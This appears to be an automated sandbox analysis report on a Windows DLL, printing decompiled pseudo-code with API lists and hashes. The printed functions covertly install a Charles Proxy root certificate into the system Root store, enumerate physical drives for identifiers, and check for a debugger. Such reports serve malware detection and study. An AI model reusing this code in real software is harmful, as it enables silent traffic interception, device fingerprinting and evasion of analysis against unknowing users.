				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CEAF(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69); // executed
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA40(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root"); // executed
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0); // executed
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CEAF(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF80(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF80(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF80(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CCA3(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CCA3(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F6E0(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA40(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}






























                                                                                                                                                                  0x1001f780
                                                                                                                                                                  0x1001f780
                                                                                                                                                                  0x1001f780
                                                                                                                                                                  0x1001f789
                                                                                                                                                                  0x1001f790
                                                                                                                                                                  0x1001f797
                                                                                                                                                                  0x1001f79e
                                                                                                                                                                  0x1001f7a5
                                                                                                                                                                  0x1001f7c6
                                                                                                                                                                  0x1001f7da
                                                                                                                                                                  0x1001f7df
                                                                                                                                                                  0x1001f7e2
                                                                                                                                                                  0x1001f7e5
                                                                                                                                                                  0x1001f7e9
                                                                                                                                                                  0x1001f803
                                                                                                                                                                  0x1001f809
                                                                                                                                                                  0x1001f813
                                                                                                                                                                  0x1001f819
                                                                                                                                                                  0x1001f81f
                                                                                                                                                                  0x1001f820
                                                                                                                                                                  0x1001f825
                                                                                                                                                                  0x1001f82c
                                                                                                                                                                  0x1001f842
                                                                                                                                                                  0x1001f848
                                                                                                                                                                  0x1001f84f
                                                                                                                                                                  0x1001f859
                                                                                                                                                                  0x1001f861
                                                                                                                                                                  0x1001f869
                                                                                                                                                                  0x1001f877
                                                                                                                                                                  0x1001f87d
                                                                                                                                                                  0x1001f882
                                                                                                                                                                  0x1001f888
                                                                                                                                                                  0x1001f88f
                                                                                                                                                                  0x1001f8a2
                                                                                                                                                                  0x1001f8a8
                                                                                                                                                                  0x1001f8ac
                                                                                                                                                                  0x1001f8b9
                                                                                                                                                                  0x1001f8be
                                                                                                                                                                  0x1001f8c1
                                                                                                                                                                  0x1001f8c4
                                                                                                                                                                  0x1001f8c8
                                                                                                                                                                  0x1001f8db
                                                                                                                                                                  0x1001f8f1
                                                                                                                                                                  0x1001f8f7
                                                                                                                                                                  0x1001f90c
                                                                                                                                                                  0x1001f914
                                                                                                                                                                  0x1001f929
                                                                                                                                                                  0x1001f92e
                                                                                                                                                                  0x1001f931
                                                                                                                                                                  0x1001f94c
                                                                                                                                                                  0x1001f952
                                                                                                                                                                  0x1001f955
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001f97c
                                                                                                                                                                  0x1001f981
                                                                                                                                                                  0x1001f943
                                                                                                                                                                  0x1001f943
                                                                                                                                                                  0x1001f946
                                                                                                                                                                  0x1001f946
                                                                                                                                                                  0x1001f999
                                                                                                                                                                  0x1001f9bd
                                                                                                                                                                  0x1001f9c3
                                                                                                                                                                  0x1001f9c4
                                                                                                                                                                  0x1001f9c9
                                                                                                                                                                  0x1001f8c8
                                                                                                                                                                  0x1001f8ac
                                                                                                                                                                  0x1001f86b
                                                                                                                                                                  0x1001f86b
                                                                                                                                                                  0x1001f86b
                                                                                                                                                                  0x1001f9d2
                                                                                                                                                                  0x1001f9d2
                                                                                                                                                                  0x1001f9dc
                                                                                                                                                                  0x1001f9dc
                                                                                                                                                                  0x1001f82c
                                                                                                                                                                  0x1001f7e9
                                                                                                                                                                  0x1001f9e8

                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
                                                                                                                                                                  • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
                                                                                                                                                                  • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 1001F877
                                                                                                                                                                  • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F8A2
                                                                                                                                                                  • _memset.LIBCMT ref: 1001F8DB
                                                                                                                                                                  • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F8F1
                                                                                                                                                                  • _memset.LIBCMT ref: 1001F90C
                                                                                                                                                                  • _memset.LIBCMT ref: 1001F929
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001F97C
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001F999
                                                                                                                                                                  • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                                  • API String ID: 3311258246-1857994723
                                                                                                                                                                  • Opcode ID: 1e4d97f329b5e1f4bc93b0763e4fcb6cb0116e427961557286b91f0a253fefe1
                                                                                                                                                                  • Instruction ID: 735c7eb008ba94e8865f05c141388d8d9a48af4fd13d1d85c3f126029706ba6d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e4d97f329b5e1f4bc93b0763e4fcb6cb0116e427961557286b91f0a253fefe1
                                                                                                                                                                  • Instruction Fuzzy Hash: B76133B5D00219AFEB10DF90CC99FFEB7B4EB48704F104598E605AB181D7B5AA85CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001D840, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E1001D840(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t73;
				int _t78;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF80(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_t73 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v48 = _t73;
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					_t78 = DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0); // executed
					if(_t78 == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF80(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF80( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CDD0( &_v1596);
					_t94 = E1001D000(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}







































                                                                                                                                                                  0x1001d840
                                                                                                                                                                  0x1001d84c
                                                                                                                                                                  0x1001d853
                                                                                                                                                                  0x1001dac4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dac4
                                                                                                                                                                  0x1001d859
                                                                                                                                                                  0x1001d863
                                                                                                                                                                  0x1001d86d
                                                                                                                                                                  0x1001d87a
                                                                                                                                                                  0x1001d891
                                                                                                                                                                  0x1001d8ac
                                                                                                                                                                  0x1001d8b2
                                                                                                                                                                  0x1001d8cb
                                                                                                                                                                  0x1001d8d1
                                                                                                                                                                  0x1001d8d8
                                                                                                                                                                  0x1001da9d
                                                                                                                                                                  0x1001daac
                                                                                                                                                                  0x1001dab5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dabf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dab7
                                                                                                                                                                  0x1001d8de
                                                                                                                                                                  0x1001d8e8
                                                                                                                                                                  0x1001d8f2
                                                                                                                                                                  0x1001d8fc
                                                                                                                                                                  0x1001d906
                                                                                                                                                                  0x1001d910
                                                                                                                                                                  0x1001d91a
                                                                                                                                                                  0x1001d943
                                                                                                                                                                  0x1001d94b
                                                                                                                                                                  0x1001da97
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da97
                                                                                                                                                                  0x1001d95a
                                                                                                                                                                  0x1001da76
                                                                                                                                                                  0x1001da7a
                                                                                                                                                                  0x1001da87
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da89
                                                                                                                                                                  0x1001d974
                                                                                                                                                                  0x1001d97f
                                                                                                                                                                  0x1001d985
                                                                                                                                                                  0x1001d98c
                                                                                                                                                                  0x1001d993
                                                                                                                                                                  0x1001d99a
                                                                                                                                                                  0x1001d9a1
                                                                                                                                                                  0x1001d9a8
                                                                                                                                                                  0x1001d9af
                                                                                                                                                                  0x1001d9b6
                                                                                                                                                                  0x1001d9bd
                                                                                                                                                                  0x1001d9cf
                                                                                                                                                                  0x1001d9fb
                                                                                                                                                                  0x1001da00
                                                                                                                                                                  0x1001da05
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da0d
                                                                                                                                                                  0x1001da16
                                                                                                                                                                  0x1001da19
                                                                                                                                                                  0x1001da22
                                                                                                                                                                  0x1001da2a
                                                                                                                                                                  0x1001da33
                                                                                                                                                                  0x1001da3c
                                                                                                                                                                  0x1001da50
                                                                                                                                                                  0x1001da60
                                                                                                                                                                  0x1001da65
                                                                                                                                                                  0x1001da6a
                                                                                                                                                                  0x1001da6c
                                                                                                                                                                  0x1001da6c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da6a
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D891
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D8AC
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D8CB
                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000000FF,00074080,00000000,00000000,00000000,00000018,00000000,00000000), ref: 1001D943
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D9CF
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DA7A
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DA97
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 381188756-2935326385
                                                                                                                                                                  • Opcode ID: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
                                                                                                                                                                  • Instruction ID: 9769834fe5c7fcaed127812980974d4bd2fdd9b920265f280a0c2248b2b16186
                                                                                                                                                                  • Opcode Fuzzy Hash: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
                                                                                                                                                                  • Instruction Fuzzy Hash: EA615EB0D042189BEB20DF94CC95BDDB7B6EF84314F148199E5097B280DB76AAD8CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001DAD0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E1001DAD0(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t43;
				int _t48;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018B00(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_t43 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0); // executed
					_v16 = _t43;
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF80(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					_t48 = DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0); // executed
					if(_t48 != 0) {
						E1000CF80(_t70,  &_v11556, 0, 0x3e8);
						E1001D0A0(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001D000( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					FindCloseChangeNotification(_v16); // executed
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}




















                                                                                                                                                                  0x1001dad0
                                                                                                                                                                  0x1001dad8
                                                                                                                                                                  0x1001dae1
                                                                                                                                                                  0x1001dc50
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc50
                                                                                                                                                                  0x1001dae7
                                                                                                                                                                  0x1001daee
                                                                                                                                                                  0x1001daf5
                                                                                                                                                                  0x1001daff
                                                                                                                                                                  0x1001db1c
                                                                                                                                                                  0x1001db22
                                                                                                                                                                  0x1001db38
                                                                                                                                                                  0x1001db3e
                                                                                                                                                                  0x1001db45
                                                                                                                                                                  0x1001dc2e
                                                                                                                                                                  0x1001dc34
                                                                                                                                                                  0x1001dc3a
                                                                                                                                                                  0x1001dc44
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc4b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc46
                                                                                                                                                                  0x1001db4b
                                                                                                                                                                  0x1001db55
                                                                                                                                                                  0x1001db5f
                                                                                                                                                                  0x1001db69
                                                                                                                                                                  0x1001db81
                                                                                                                                                                  0x1001db86
                                                                                                                                                                  0x1001dbb0
                                                                                                                                                                  0x1001dbb8
                                                                                                                                                                  0x1001dbc8
                                                                                                                                                                  0x1001dbe5
                                                                                                                                                                  0x1001dbfd
                                                                                                                                                                  0x1001dc02
                                                                                                                                                                  0x1001dc07
                                                                                                                                                                  0x1001dc09
                                                                                                                                                                  0x1001dc09
                                                                                                                                                                  0x1001dc07
                                                                                                                                                                  0x1001dc14
                                                                                                                                                                  0x1001dc1e
                                                                                                                                                                  0x1001dc2b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc20
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc20
                                                                                                                                                                  0x1001dc1e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001DB1C
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DB81
                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DBB0
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DBC8
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DC14
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotificationwsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 198797371-2935326385
                                                                                                                                                                  • Opcode ID: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
                                                                                                                                                                  • Instruction ID: 915ac6fd4bdffd3e24e0157f7485166cbeb8f51988887240e801f9576dbfd67f
                                                                                                                                                                  • Opcode Fuzzy Hash: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
                                                                                                                                                                  • Instruction Fuzzy Hash: B3413F75E40218EBEB10EB90DC89FDDB7B8EB14704F104599E509AA2C1D7B4ABC8CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A000, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A000() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                                  0x1001a006
                                                                                                                                                                  0x1001a018
                                                                                                                                                                  0x1001a02a
                                                                                                                                                                  0x1001a03e
                                                                                                                                                                  0x1001a04d

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 1001A012
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 1001A024
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 1001A037
                                                                                                                                                                  • NtQueryInformationProcess.NTDLL(00000000), ref: 1001A03E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                  • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                  • API String ID: 3653371871-801751246
                                                                                                                                                                  • Opcode ID: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
                                                                                                                                                                  • Instruction ID: 71e2acb23208394f78a226fd07bfd7a9a839184327190de95aec6d8225f51f41
                                                                                                                                                                  • Opcode Fuzzy Hash: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0A575D44208FFEB10EBE0DD8DB9DBBB8EB04201F614494EA15A6180EA746A49CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019F60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019F60() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
